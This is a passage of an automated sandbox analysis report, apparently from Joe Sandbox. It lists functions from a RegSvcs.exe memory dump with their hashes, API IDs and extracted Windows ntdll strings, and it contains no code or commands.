                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                  • Instruction ID: 700c65215880cbaf4961815436c19e070f2e83388135442424ba0706eebbe889
                                                                  • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                  • Instruction Fuzzy Hash: DE81F370E012499EEF25CE6CCAD0BFEBBB5AF45321F18451AD85BA76C1C7308840CB51
                                                                  Function 01979126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$@
                                                                  • API String ID: 3446177414-1194432280
                                                                  • Opcode ID: c44d939f61d4b9f5ea84f0d0acd817aebd8f04553135fbb129eb7ed9dd5e92ac
                                                                  • Instruction ID: 75535cb34ecba7f4dc80e0259bd9ec57fe6e982ca89cffd667b6d93ba90f6da6
                                                                  • Opcode Fuzzy Hash: c44d939f61d4b9f5ea84f0d0acd817aebd8f04553135fbb129eb7ed9dd5e92ac
                                                                  • Instruction Fuzzy Hash: 6E810A75D002699BDB35DB54CC45BEAB6B8BF48714F0041EAEA1DB7250E7309E85CFA0
                                                                  Function 019B4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0I9w$0I9w$0I9w$X
                                                                  • API String ID: 3446177414-880155641
                                                                  • Opcode ID: e3f3a9b838956a18c40489a211027f1be274ed0baca2eb9b8525691896f00059
                                                                  • Instruction ID: 72916bdad407e25f2be2eab3b86f2164c150b64145a489b7cfdbc4d57cf614cf
                                                                  • Opcode Fuzzy Hash: e3f3a9b838956a18c40489a211027f1be274ed0baca2eb9b8525691896f00059
                                                                  • Instruction Fuzzy Hash: EA318D3590420AEFCF22DF58DA80BCE7BA9AB88759F01401DFD199B252D2709A51EF85
                                                                  Function 0199DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                  • API String ID: 3446177414-56086060
                                                                  • Opcode ID: 378a382eb29715f653c0b11311390cf5c0a355563995ad8c9aacd888c1e2ecae
                                                                  • Instruction ID: 36abeb25a6f13b39c1b1006ee440094d2e96fd75d108ab83c77046be001c6b99
                                                                  • Opcode Fuzzy Hash: 378a382eb29715f653c0b11311390cf5c0a355563995ad8c9aacd888c1e2ecae
                                                                  • Instruction Fuzzy Hash: 10415631600749DFDB22DFACC586B6ABBF8EF40725F108569E50E87A91C778A981C790
                                                                  Function 019F4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 019F4899
                                                                  • LdrpCheckRedirection, xrefs: 019F488F
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019F4888
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 3446177414-3154609507
                                                                  • Opcode ID: fbebadfa3e8e71cde4c8b1224297eab98e11ff0f40974b41af7ee993c9e516fd
                                                                  • Instruction ID: 967dd8914ace841bb444970f4d176d1723bcbc2235193c152219c1ad3fcb4267
                                                                  • Opcode Fuzzy Hash: fbebadfa3e8e71cde4c8b1224297eab98e11ff0f40974b41af7ee993c9e516fd
                                                                  • Instruction Fuzzy Hash: 4941AE32A04651AFCB21CE69D840E27BBE8AF89A51F15066DEE4C97325D730E800CBD2
                                                                  Function 0199DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                  • API String ID: 3446177414-3526935505
                                                                  • Opcode ID: 2fa81c209fe433e45a127ed10bf0c14a83cae82260a6ee96cc77740c0727e1d6
                                                                  • Instruction ID: f84a84f87ce40c7500891e2ab48ac55ae72f8fafcbc82488d0f022f9d2adb660
                                                                  • Opcode Fuzzy Hash: 2fa81c209fe433e45a127ed10bf0c14a83cae82260a6ee96cc77740c0727e1d6
                                                                  • Instruction Fuzzy Hash: B53156312047C4DFEB26DB6CC84AFA67BE8EF41B14F058459E40F87652D7B8A881C761
                                                                  Function 0196C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $
                                                                  • API String ID: 3446177414-3993045852
                                                                  • Opcode ID: deba2d7d5ce68dbf925d29a5b7f1f2f912fe8489e9a39431e69ae9a1260c3ce8
                                                                  • Instruction ID: cd86c711e835f2eaed8a98ce7765a0254273182b61377edfb2a102344d97dea0
                                                                  • Opcode Fuzzy Hash: deba2d7d5ce68dbf925d29a5b7f1f2f912fe8489e9a39431e69ae9a1260c3ce8
                                                                  • Instruction Fuzzy Hash: 96116136904219EFCF15AFA4E948ADD7B71FF85761F108529F86A672E0CB319A01CF81
                                                                  Function 0199EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f075250305e27529f45c82400f6c3b3da2d154e25e441f01435462d0025fbd00
                                                                  • Instruction ID: bf7d2cbd85285b432a38e60870737941eb4c53383fdd5d1f1898c3842b3b4e33
                                                                  • Opcode Fuzzy Hash: f075250305e27529f45c82400f6c3b3da2d154e25e441f01435462d0025fbd00
                                                                  • Instruction Fuzzy Hash: 5DE1DCB4900608DFCF26CFADC984A9DFBF9BF48315F24496AE54AA7261D770A841CF50
                                                                  Function 019EEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 995faa4ede7c5fed5097b51be711721ab8d39cfda4429caa82b07af2b598992c
                                                                  • Instruction ID: d8e451448683e406cddd699ed4f54f62a1b50bbe418c0f07cc34c8a241cdbfb9
                                                                  • Opcode Fuzzy Hash: 995faa4ede7c5fed5097b51be711721ab8d39cfda4429caa82b07af2b598992c
                                                                  • Instruction Fuzzy Hash: 86712671E0021D9FDF06CFA8C988ADDBBF5BF49354F14402AE909EB254D734A945CB64
                                                                  Function 019EF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 7e88b66fc877775682b8c07eb9a64ff08bb111450c99592a6a7d616f85ac5eb7
                                                                  • Instruction ID: 99147d8ffe717827e9e14edd8611845097242ef92f16ab2e2f74c9b186eee1fb
                                                                  • Opcode Fuzzy Hash: 7e88b66fc877775682b8c07eb9a64ff08bb111450c99592a6a7d616f85ac5eb7
                                                                  • Instruction Fuzzy Hash: 55513476E00219EFEF0ACF98D848ADDBBF5BF88355F14812AE909A7250D734A941CF54
                                                                  Function 019A7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                  • String ID:
                                                                  • API String ID: 4281723722-0
                                                                  • Opcode ID: b61e777c2ac89e2e7a48fb71a9a5c2d4718dde05b33293e7909e45d0014dbc30
                                                                  • Instruction ID: 969e8e5c50cc15f17ed33411f5279e06601a2ea59dbf2aefa6bc33c47ad0b335
                                                                  • Opcode Fuzzy Hash: b61e777c2ac89e2e7a48fb71a9a5c2d4718dde05b33293e7909e45d0014dbc30
                                                                  • Instruction Fuzzy Hash: 54310675E00219EFCF25DFA8D849A9EBBF1BB48720F10412AE519F7294DB355901CF54
                                                                  Function 019759C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: a7acc20d8ebd350f5e6922d2326cd49b5334a41e98f17d53b8af1867c86e2d16
                                                                  • Instruction ID: b0a9a036122082d75e9324b0cb7eb5385a07d579eef4ff86d8ddf165b140ebd5
                                                                  • Opcode Fuzzy Hash: a7acc20d8ebd350f5e6922d2326cd49b5334a41e98f17d53b8af1867c86e2d16
                                                                  • Instruction Fuzzy Hash: 80325670D0426ADFEB61DF68C884BE9BBB4BF48304F0485E9D54DA7241D774AA84CF91
                                                                  Function 019B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                  • Instruction ID: 05d92f948f515153ca9c073e16b7125e19b4a737b37c554af87163f2da5e3de7
                                                                  • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                  • Instruction Fuzzy Hash: 4191A571E002069ADB28DFADCAC0AFEBBA9AFC4761F14471AE95DE72D0D73099408715
                                                                  Function 0198D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Bl$l
                                                                  • API String ID: 3446177414-208461968
                                                                  • Opcode ID: 7fba8e95d538b4431d531c930cce85b6cc149e587d801d8a3e3298a19a66b10f
                                                                  • Instruction ID: d154daed2f77eac5826474e95ca7952c18b144297ab7e02d464c252c48e41d64
                                                                  • Opcode Fuzzy Hash: 7fba8e95d538b4431d531c930cce85b6cc149e587d801d8a3e3298a19a66b10f
                                                                  • Instruction Fuzzy Hash: 04A1C431A003299BEF35EBA9C880BAAB7F5BB45704F0440EAD50D672D1DB74AE85CF51
                                                                  Function 019B5DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 019B5E34
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: bad333a652b7b5d477c83f180c3ac52f3205b62cbb52d94f32b431059d4c319a
                                                                  • Instruction ID: 88298a4e1346732aff5aac58f702017cfbbb1db5cabeab56ee502a38c8d31479
                                                                  • Opcode Fuzzy Hash: bad333a652b7b5d477c83f180c3ac52f3205b62cbb52d94f32b431059d4c319a
                                                                  • Instruction Fuzzy Hash: 74514971908206A7FB22B61CCBC57FE6B98EB40711F15CD58E0DF862DDEA3484958B46
                                                                  Function 019A4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$Flst
                                                                  • API String ID: 0-758220159
                                                                  • Opcode ID: 9ab623d67385f2514a3171c4a7bc50fb9e35eb659fe5e6ca564f1d0b72e1fd0d
                                                                  • Instruction ID: 9795926f77e7a921e3df9837c052e4a8c4edf9f4a2eab795cdb407413e1560ea
                                                                  • Opcode Fuzzy Hash: 9ab623d67385f2514a3171c4a7bc50fb9e35eb659fe5e6ca564f1d0b72e1fd0d
                                                                  • Instruction Fuzzy Hash: DD515EB1E002158FDF26CF99C584669FBF8FF44715F58806AD14D9B251EBB0A949CBC0
                                                                  Function 0199D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 0199D959
                                                                    • Part of subcall function 01974859: RtlDebugPrintTimes.NTDLL ref: 019748F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
